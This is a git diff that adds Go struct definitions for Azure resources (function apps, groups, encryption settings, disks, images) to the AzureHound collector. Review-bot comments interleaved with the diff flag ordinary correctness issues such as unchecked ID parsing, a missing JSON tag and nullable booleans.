@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The instance view of the disk.
+type DiskInstanceView struct {
+ // Specifies the encryption settings for the OS Disk.
+ // Minimum api-version: 2015-06-15
+ EncryptionSettings []DiskEncryptionSettings `json:"encryptionSettings,omitempty"`
+
+ // The disk name.
+ Name string `json:"name,omitempty"`
+
+ // The resource status information.
+ Statuses []InstanceViewStatus `json:"statuses,omitempty"`
+}
diff --git a/models/azure/employee_org_data.go b/models/azure/employee_org_data.go
new file mode 100644
index 0000000..97bf5de
--- /dev/null
+++ b/models/azure/employee_org_data.go
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents organization data associated with a user.
+type EmployeeOrgData struct {
+ // The name of the division in which the user works.
+ //
+ // Returned only on `$select`
+ // Supports `$filter`
+ Division string `json:"division,omitempty"`
+
+ // The cost center assoicated with the user.
+ //
+ // Returned only on `$select`
+ // Supports `$filter`
+ CostCenter string `json:"costCenter,omitempty"`
+}
diff --git a/models/azure/encryption_properties.go b/models/azure/encryption_properties.go
new file mode 100644
index 0000000..26b2ca8
--- /dev/null
+++ b/models/azure/encryption_properties.go
@@ -0,0 +1,61 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AutomationAccountEncryptionProperties struct { + Identity ManagedIdentity `json:"identity,omitempty"` + KeySource enums.EncryptionKeySourceType `json:"keySource,omitempty"` + KeyVaultProperties KeyVaultProperties `json:"keyVaultProperties,omitempty"` +} + +type StorageAccountEncryptionProperties struct { + Identity StorageAccountEncryptionIdentity `json:"identity,omitempty"` + KeySource enums.EncryptionKeySourceType `json:"keySource,omitempty"` + Keyvaultproperties KeyVaultProperties `json:"keyvaultproperties,omitempty"` + RequireInfrastructureEncryption bool `json:"requireInfrastructureEncryption,omitempty"` + Services EncryptionServices `json:"services,omitempty"` +} + +type KeyVaultProperties struct { + CurrentVersionedKeyExpirationTimestamp string `json:"currentVersionedKeyExpirationTimestamp,omitempty"` + CurrentVersionedKeyIdentifier string `json:"currentVersionedKeyIdentifier,omitempty"` + KeyName string `json:"keyName,omitempty"` + KeyVersion string `json:"keyVersion,omitempty"` + KeyvaultUri string `json:"keyvaultUri,omitempty"` + LastKeyRotationTimestamp string `json:"lastKeyRotationTimestamp,omitempty"` +} + +type StorageAccountEncryptionIdentity struct { + 
FederatedIdentityClientId string `json:"federatedIdentityClientId,omitempty"` + UserAssignedIdentity string `json:"userAssignedIdentity,omitempty"` +} + +type EncryptionServices struct { + Blob EncryptionService `json:"blob,omitempty"` + File EncryptionService `json:"file,omitempty"` + Queue EncryptionService `json:"queue,omitempty"` + Table EncryptionService `json:"table,omitempty"` +} + +type EncryptionService struct { + Enabled bool `json:"enabled,omitempty"` + KeyType enums.EncryptionKeyType `json:"keyType,omitempty"` + LastEnabledTime string `json:"lastEnabledTime,omitempty"` +} diff --git a/models/azure/entity.go b/models/azure/entity.go new file mode 100644 index 0000000..2c25565 --- /dev/null +++ b/models/azure/entity.go @@ -0,0 +1,22 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type Entity struct { + Id string `json:"id"` +} diff --git a/models/azure/extended_location.go b/models/azure/extended_location.go new file mode 100644 index 0000000..76e94bc --- /dev/null +++ b/models/azure/extended_location.go 
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ExtendedLocation struct {
+ Name string `json:"name,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/function_app.go b/models/azure/function_app.go
new file mode 100644
index 0000000..ab1fc51
--- /dev/null
+++ b/models/azure/function_app.go
@@ -0,0 +1,51 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type FunctionApp struct {
+ Entity
+
+ ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Kind string `json:"kind,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties FunctionAppProperties `json:"properties,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+func (s FunctionApp) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s FunctionApp) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/function_app_props.go b/models/azure/function_app_props.go
new file mode 100644
index 0000000..1aa342c
--- /dev/null
+++ b/models/azure/function_app_props.go
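Review bot: `ResourceGroupName` and `ResourceGroupId` pick segments of the split `Id` by position without checking that segment 3 is `resourceGroups`, so an Id of any other shape (subscription- or provider-scoped, or malformed) yields an arbitrary segment as the resource group. The two methods also disagree on the minimum length, `len(parts) > 4` versus `len(parts) > 5`, although `parts[:5]` only needs five elements. I would put the same guard in both, `if len(parts) < 5 || !strings.EqualFold(parts[3], "resourceGroups") { return "" }`, and drop the `else` after `return`. Neither method has a doc comment; one line stating the expected Id layout would make the index choice reviewable.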
@@ -0,0 +1,84 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type FunctionAppProperties struct { + AvailabilityState enums.SiteAvailabilityState `json:"availabilityState,omitempty"` + ClientAffinityEnabled bool `json:"clientAffinityEnabled,omitempty"` + ClientCertEnabled bool `json:"clientCertEnabled,omitempty"` + ClientCertExclusionPaths string `json:"clientCertExclusionPaths,omitempty"` + ClientCertMode enums.ClientCertMode `json:"clientCertMode,omitempty"` + CloningInfo CloningInfo `json:"cloningInfo,omitempty"` + ContainerSize int `json:"containerSize,omitempty"` + CustomDomainVerificationId string `json:"customDomainVerificationId,omitempty"` + DailyMemoryTimeQuota int `json:"dailyMemoryTimeQuota,omitempty"` + DefaultHostName string `json:"defaultHostName,omitempty"` + Enabled bool `json:"enabled,omitempty"` + EnabledHostnames []string `json:"enabledHostnames,omitempty"` + HostingEnvironmentProfile HostingEnvironmentProfile `json:"hostingEnvironmentProfile,omitempty"` + Hostnames []string `json:"hostNames,omitempty"` + HostNamesDisabled bool `json:"hostNamesDisabled,omitempty"` + HostNameSslStates []HostNameSslState `json:"hostNameSslStates,omitempty"` + HttpsOnly bool `json:"httpsOnly,omitempty"` + HyperV bool 
`json:"hyperV,omitempty"` + InProgressOperationId string `json:"inProgressOperationId,omitempty"` + IsDefaultContainer bool `json:"isDefaultContainer,omitempty"` + IsXenon bool `json:"isXenon,omitempty"` + KeyVaultReferenceIdentity string `json:"keyVaultReferenceIdentity,omitempty"` + LastModifiedTimeUTC string `json:"lastModifiedTimeUtc,omitempty"` + MaxNumberOfWorkers int `json:"maxNumberOfWorkers,omitempty"` + OutboundIpAddresses string `json:"outboundIpAddresses,omitempty"` + PossibleOutboundIpAddresses string `json:"possibleOutboundIpAddresses,omitempty"` + PublicNetworkAccess string `json:"publicNetworkAccess,omitempty"` + RedundancyMode enums.RedundancyMode `json:"redundancyMode,omitempty"` + RepositorySiteName string `json:"repositorySiteName,omitempty"` + Reserved bool `json:"reserved,omitempty"` + ResourceGroup string `json:"resourceGroup,omitempty"` + ScmSiteAlsoStopped bool `json:"scmSiteAlsoStopped,omitempty"` + ServerFarmId string `json:"serverFarmId,omitempty"` + SiteConfig SiteConfig `json:"siteConfig,omitempty"` + SlotSwapStatus SlotSwapStatus `json:",omitempty"` + State string `json:"state,omitempty"` + StorageAccountRequired bool `json:"storageAccountRequired,omitempty"` + SuspendedTill string `json:"suspendedTill,omitempty"` + TargetSwapSlot string `json:"targetSwapSlot,omitempty"` + TrafficManagerHostNames []string `json:"trafficManagerHostNames,omitempty"` + UsageState enums.UsageState `json:"usageState,omitempty"` + VirtualNetworkSubnetId string `json:"virtualNetworkSubnetId,omitempty"` + VnetContentShareEnabled bool `json:"vnetContentShareEnabled,omitempty"` + VnetImagePullEnabled bool `json:"vnetImagePullEnabled,omitempty"` + VnetRouteAllEnabled bool `json:"vnetRouteAllEnabled,omitempty"` + + // Following elements have been found in testing within the returned object, but not present in the official documentation + AdminEnabled bool `json:"adminEnabled,omitempty"` + ComputeMode string `json:"computeMode,omitempty"` + 
ContainerAllocationSubnet string `json:"containerAllocationSubnet,omitempty"` + ContentAvailabilityState string `json:"contentAvailabilityState,omitempty"` + FtpsHostName string `json:"ftpsHostName,omitempty"` + FtpUsername string `json:"ftpUsername,omitempty"` + InboundIPAddress string `json:"inboundIpAddress,omitempty"` + Kind string `json:"kind,omitempty"` + Name string `json:"name,omitempty"` + PossibleInboundIpAddresses string `json:"possibleInboundIpAddresses,omitempty"` + PrivateEndpointConnections string `json:"privateEndpointConnections,omitempty"` + RuntimeAvailabilityState string `json:"runtimeAvailabilityState,omitempty"` + SelfLink string `json:"selfLink,omitempty"` + StorageRecoveryDefaultState string `json:"storageRecoveryDefaultState,omitempty"` +} diff --git a/models/azure/geo_replication_stats.go b/models/azure/geo_replication_stats.go new file mode 100644 index 0000000..3f47fa4 --- /dev/null +++ b/models/azure/geo_replication_stats.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type GeoReplicationStats struct { + CanFailover bool `json:"canFailover,omitempty"` + LastSyncTime string `json:"lastSyncTime,omitempty"` + Status enums.GeoReplicationStatus `json:"status,omitempty"` +} 
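Review bot: `SlotSwapStatus` in `FunctionAppProperties` is tagged `json:",omitempty"` with no key name, so it marshals under the Go field name `SlotSwapStatus` while every other field uses the API's camelCase key; it should be `json:"slotSwapStatus,omitempty"`. `omitempty` also has no effect on struct-typed fields such as `CloningInfo`, `SiteConfig` and `SlotSwapStatus`, which are always emitted. The block of fields marked as absent from the official documentation includes `FtpUsername` and the inbound address fields; a short comment stating whether these are meant to reach the collected output would help reviewers judge how the resulting files need to be handled.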
diff --git a/models/azure/group.go b/models/azure/group.go
new file mode 100644
index 0000000..de58049
--- /dev/null
+++ b/models/azure/group.go
@@ -0,0 +1,281 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents an Azure Active Directory (Azure AD) group, which can be a Microsoft 365 group, or a security group. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/group?view=graph-rest-1.0 +type Group struct { + DirectoryObject + + // Indicates if people external to the organization can send messages to the group. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + AllowExternalSenders bool `json:"allowExternalSenders,omitempty"` + + // The list of sensitivity label pairs (label ID, label name) associated with a Microsoft 365 group. + // Returned only on $select. + // Read-only. + AssignedLabels []AssignedLabel `json:"assignedLabels,omitempty"` + + // The licenses that are assigned to the group. + // Returned only on $select. + // Supports $filter (eq) + // Read-only. + AssignedLicenses []AssignedLicense `json:"assignedLicenses,omitempty"` + + // Indicates if new members added to the group will be auto-subscribed to receive email notifications. + // You can set this property in a PATCH request for the group; do not set it in the initial POST request that + // creates the group. + // Default value is false. 
+ // Returned only on $select for GET /groups/{ID} + AutoSubscribeNewMembers bool `json:"autoSubscribeNewMembers,omitempty"` + + // Describes a classification for the group (such as low, medium or high business impact). + // Valid values for this property are defined by creating a ClassificationList setting value, based on the template + // definition. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) + Classification string `json:"classification,omitempty"` + + // Timestamp of when the group was created. + // The value cannot be modified and is automatically populated when the group is created. The Timestamp type + // represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // For some Azure Active Directory objects (user, group, application), if the object is deleted, it is first + // logically deleted, and this property is updated with the date and time when the object was deleted. Otherwise, + // this property is null. If the object is restored, this property is updated to null. + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // An optional description for the group. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search. + Description string `json:"description,omitempty"` + + // The display name for the group. + // This property is required when a group is created and cannot be cleared during updates. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy. + DisplayName string `json:"displayName,omitempty"` + + // Timestamp of when the group is set to expire. The value cannot be modified and is automatically populated when + // the group is created. 
The Timestamp type represents date and time information using ISO 8601 format and is always + // in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + ExpirationDateTime string `json:"expirationDateTime,omitempty"` + + // Specifies the group type and its membership. + // If the collection contains Unified, the group is a Microsoft 365 group; otherwise, it's either a security group + // or distribution group. For details, see groups overview. + // If the collection includes DynamicMembership, the group has dynamic membership; otherwise, membership is static. + // Returned by default. + // Supports $filter (eq, NOT). + GroupTypes []string `json:"groupTypes,omitempty"` + + // Indicates whether there are members in this group that have license errors from its group-based license + // assignment. + // This property is never returned on a GET operation. + // You can use it as a $filter argument to get groups that have members with license errors (that is, filter for + // this property being true) + // Supports $filter (eq). + HasMembersWithLicenseErrors bool `json:"hasMembersWithLicenseErrors,omitempty"` + + // True if the group is not displayed in certain parts of the Outlook UI: the Address Book, address lists for + // selecting message recipients, and the Browse Groups dialog for searching groups; otherwise, false. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + HideFromAddressLists bool `json:"hideFromAddressLists,omitempty"` + + // True if the group is not displayed in Outlook clients, such as Outlook for Windows and Outlook on the web; + // otherwise, false. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + HideFromOutlookClients bool `json:"hideFromOutlookClients,omitempty"` + + // Indicates whether this group can be assigned to an Azure Active Directory role or not. 
+ // Optional. + // This property can only be set while creating the group and is immutable. If set to true, the securityEnabled + // property must also be set to true and the group cannot be a dynamic group (that is, groupTypes cannot contain + // DynamicMembership). Only callers in Global administrator and Privileged role administrator roles can set this + // property. The caller must be assigned the RoleManagement.ReadWrite.Directory permission to set this property or + // update the membership of such groups. For more, see Using a group to manage Azure AD role assignments + // Returned by default. + // Supports $filter (eq, ne, NOT). + IsAssignableToRole bool `json:"isAssignableToRole,omitempty"` + + // Indicates whether the signed-in user is subscribed to receive email conversations. + // Default value is true. + // Returned only on $select for GET /groups/{ID} + IsSubscribedByMail bool `json:"isSubscribedByMail,omitempty"` + + // Indicates status of the group license assignment to all members of the group. + // Default value is false. + // Read-only. + // Returned only on $select. + LicenseProcessingState enums.LicenseProcessingState `json:"licenseProcessingState,omitempty"` + + // The SMTP address for the group, for example, "serviceadmins@contoso.onmicrosoft.com". + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + Mail string `json:"mail,omitempty"` + + // Specifies whether the group is mail-enabled. + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT). + MailEnabled bool `json:"mailEnabled,omitempty"` + + // The mail alias for the group, unique in the organization. + // Maximum length is 64 characters. + // This property can contain only characters in the ASCII character set 0 - 127 except: @ () \ [] " ; : . <> , SPACE + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). 
+ MailNickname string `json:"mailNickname,omitempty"` + + // The rule that determines members for this group if the group is a dynamic group (groupTypes contains + // DynamicMembership). For more information about the syntax of the membership rule, see Membership Rules syntax. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith). + MembershipRule string `json:"membershipRule,omitempty"` + + // Indicates whether the dynamic membership processing is on or paused. + // Returned by default. + // Supports $filter (eq, ne, NOT, in). + MembershipRuleProcessingState enums.RuleProcessingState `json:"membershipRuleProcessingState,omitempty"` + + // Indicates the last time at which the group was synced with the on-premises directory. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, ge, le, in). + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // Errors when using Microsoft synchronization product during provisioning. + // Returned by default. + // Supports $filter (eq, NOT). + OnPremisesProvisioningErrors []OnPremisesProvisioningError `json:"onPremisesProvisioningErrors,omitempty"` + + // Contains the on-premises SAM account name synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + // Read-only. + OnPremisesSamAccountName string `json:"onPremisesSamAccountName,omitempty"` + + // Contains the on-premises security identifier (SID) for the group that was synchronized from on-premises to the + // cloud. + // Returned by default. + // Supports $filter on null values. 
+ // Read-only. + OnPremisesSecurityIdentifier string `json:"onPremisesSecurityIdentifier,omitempty"` + + // true if this group is synced from an on-premises directory; false if this group was originally synced from an + // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises + // directory (default). + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, in). + OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"` + + // The preferred data location for the Microsoft 365 group. + // By default, the group inherits the group creator's preferred data location. To set this property, the calling + // user must be assigned one of the following Azure AD roles: + // - Global Administrator + // - User Account Administrator + // - Directory Writer + // - Exchange Administrator + // - SharePoint Administrator + // + // Nullable. + // Returned by default. + PreferredDataLocation string `json:"preferredDataLocation,omitempty"` + + // The preferred language for a Microsoft 365 group. + // Should follow ISO 639-1 Code; for example en-US. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + PreferredLanguage string `json:"preferredLanguage,omitempty"` + + // Email addresses for the group that direct to the same group mailbox. + // For example: ["SMTP: bob@contoso.com", "smtp: bob@sales.contoso.com"]. + // The any operator is required to filter expressions on multi-valued properties. + // Returned by default. + // Read-only. + // Not nullable. + // Supports $filter (eq, NOT, ge, le, startsWith). + ProxyAddresses []string `json:"proxyAddresses,omitempty"` + + // Timestamp of when the group was last renewed. + // This cannot be modified directly and is only updated via the renew service action. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. 
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + RenewedDateTime string `json:"renewedDateTime,omitempty"` + + // Specifies the group behaviors that can be set for a Microsoft 365 group during creation. + // This can be set only as part of creation (POST). + ResourceBehaviorOptions []enums.ResourceBehavior `json:"resourceBehaviorOptions,omitempty"` + + // Specifies the group resources that are provisioned as part of Microsoft 365 group creation, that are not normally + // part of default group creation. + ResourceProvisioningOptions []enums.ResourceProvisioning `json:"resourceProvisioningOptions,omitempty"` + + // Specifies whether the group is a security group. + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT, in). + SecurityEnabled bool `json:"securityEnabled,omitempty"` + + // Security identifier of the group, used in Windows scenarios. + // Returned by default. + SecurityIdentifier string `json:"securityIdentifier,omitempty"` + + // Specifies a Microsoft 365 group's color theme. Possible values are Teal, Purple, Green, Blue, Pink, Orange or Red + Theme string `json:"theme,omitempty"` + + // Count of conversations that have received new posts since the signed-in user last visited the group. + // Returned only on $select for GET /groups/{ID} + UnseenCount int32 `json:"unseenCount,omitempty"` + + // Specifies the group join policy and group content visibility for groups. + // Possible values are: Private, Public, or Hiddenmembership. + // Hiddenmembership can be set only for Microsoft 365 groups, when the groups are created. + // It can't be updated later. Other values of visibility can be updated after group creation. + // If visibility value is not specified during group creation on Microsoft Graph, a security group is created as + // Private by default and Microsoft 365 group is Public. 
Groups assignable to roles are always Private. + // Returned by default. + // Nullable. + Visibility enums.GroupVisibility `json:"visibility,omitempty"` +} diff --git a/models/azure/hardware_profile.go b/models/azure/hardware_profile.go new file mode 100644 index 0000000..e63a5fc --- /dev/null +++ b/models/azure/hardware_profile.go 
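Review bot: `OnPremisesSyncEnabled` in the `Group` struct is declared `bool`, but its own comment documents three states (true, false, and null when the object has never been synced), so a null and a false response both decode to false and both are dropped by `omitempty` on output. Declaring the field as `OnPremisesSyncEnabled *bool` keeps the difference between a group that stopped syncing and one that never synced. The same loss affects `IsSubscribedByMail`, whose documented default is true while its false value is the one omitted on encode.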
@@ -0,0 +1,40 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the hardware settings for the virtual machine.
+type HardwareProfile struct {
+
+ // Specifies the size of the virtual machine.
+ //
+ // Recommended way to get the list of available sizes is using the API:
+ // - List all available virtual machine sizes in an availability set
+ // - List all available virtual machine sizes in a region
+ // - List all available virtual machine sizes for resizing.
+ //
+ // For more information about virtual machine sizes, see Sizes for virtual machines.
+ //
+ // The available VM sizes depend on region and availability set.
+ VMSize string `json:"vmSize,omitempty"`
+
+ // Specifies the properties for customizing the size of the virtual machine. Minimum api-version: 2021-07-01.
+ //
+ // This feature is still in preview mode and is not supported for VirtualMachineScaleSet.
+ // Please follow the instructions in VM Customization for more details.
+ VMSizeProperties VMSizeProperties `json:"vmSizeProperties,omitempty"`
+}
diff --git a/models/azure/hosting_environment_profile.go b/models/azure/hosting_environment_profile.go
new file mode 100644
index 0000000..805b2df
--- /dev/null
+++ b/models/azure/hosting_environment_profile.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type HostingEnvironmentProfile struct {
+ Id string `json:"id,omitempty"`
+ Name string `json:"name,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/hostname_ssl_state.go b/models/azure/hostname_ssl_state.go
new file mode 100644
index 0000000..bddaa28
--- /dev/null
+++ b/models/azure/hostname_ssl_state.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type HostNameSslState struct {
+ HostType enums.HostType `json:"hostType,omitempty"`
+ Name string `json:"name,omitempty"`
+ SSLState enums.SslState `json:"sslState,omitempty"`
+ Thumbprint string `json:"thumbprint,omitempty"`
+ ToUpdate bool `json:"toUpdate,omitempty"`
+ VirtualIP string `json:"virtualIP,omitempty"`
+}
diff --git a/models/azure/image_reference.go b/models/azure/image_reference.go
new file mode 100644
index 0000000..05b4f4a
--- /dev/null
+++ b/models/azure/image_reference.go
@@ -0,0 +1,50 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies information about the image to use. You can specify information about platform images, marketplace images,
+// or virtual machine images. This element is required when you want to use a platform image, marketplace image, or
+// virtual machine image, but is not used in other creation operations.
+// NOTE: Image reference publisher and offer can only be set when you create the scale set.
+type ImageReference struct {
+ // Specifies in decimal numbers, the version of platform image or marketplace image used to create the virtual
+ // machine. This readonly field differs from 'version', only if the value specified in 'version' field is 'latest'.
+ ExactVersion string `json:"exactVersion,omitempty"`
+
+ // Resource ID.
+ Id string `json:"id,omitempty"`
+
+ // Specifies the offer of the platform image or marketplace image used to create the virtual machine.
+ Offer string `json:"offer,omitempty"`
+
+ // The image publisher
+ Publisher string `json:"publisher,omitempty"`
+
+ // Specified the shared gallery image unique id for vm deployment.
+ // This can be fetched from shared gallery image GET call.
+ SharedGalleryImageId string `json:"sharedGalleryImageId,omitempty"`
+
+ // The image SKU.
+ Sku string `json:"sku,omitempty"`
+
+ // Specifies the version of the platform image or marketplace image used to create the virtual machine.
+ // The allowed formats are Major.Minor.Build or 'latest'. Major, Minor, and Build are decimal numbers.
